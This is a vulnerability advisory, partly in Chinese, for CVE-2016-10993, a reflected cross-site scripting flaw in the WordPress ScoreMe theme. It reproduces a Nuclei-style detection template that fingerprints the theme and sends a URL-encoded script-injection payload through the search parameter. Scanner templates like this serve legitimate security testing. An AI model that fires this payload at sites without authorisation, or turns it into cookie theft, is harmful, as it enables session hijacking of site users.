CVE-2016-10993: ScoreMe Theme - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: ScoreMe Theme | POC: 已公开

漏洞描述

WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: CVE-2016-10993

info:
  name: ScoreMe Theme - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: |
    WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.vulnerability-lab.com/get_content.php?id=1808
    - https://wpvulndb.com/vulnerabilities/8431
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10993
    - https://github.com/0xkucing/CVE-2016-10993
    - https://github.com/ARPSyndicate/cvemon
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2016-10993
    cwe-id: CWE-79
    cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:*
    epss-score: 0.01993
    epss-percentile: 0.82973
  metadata:
    framework: wordpress
    max-request: 2
    vendor: "scoreme_project"
    product: scoreme
  tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/themes/scoreme/style'

  - method: GET
    path:
      - "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220390faa5734bfddfc9e18eeb07e27640ddfc8aa604a5e32ba39b9c06a16ebe8850220096bbf3a6e9bca5aa0693ba53f42412017f1b9b93f752de3555406902e6622fa:922c64590222798bb761d5b6d8e72950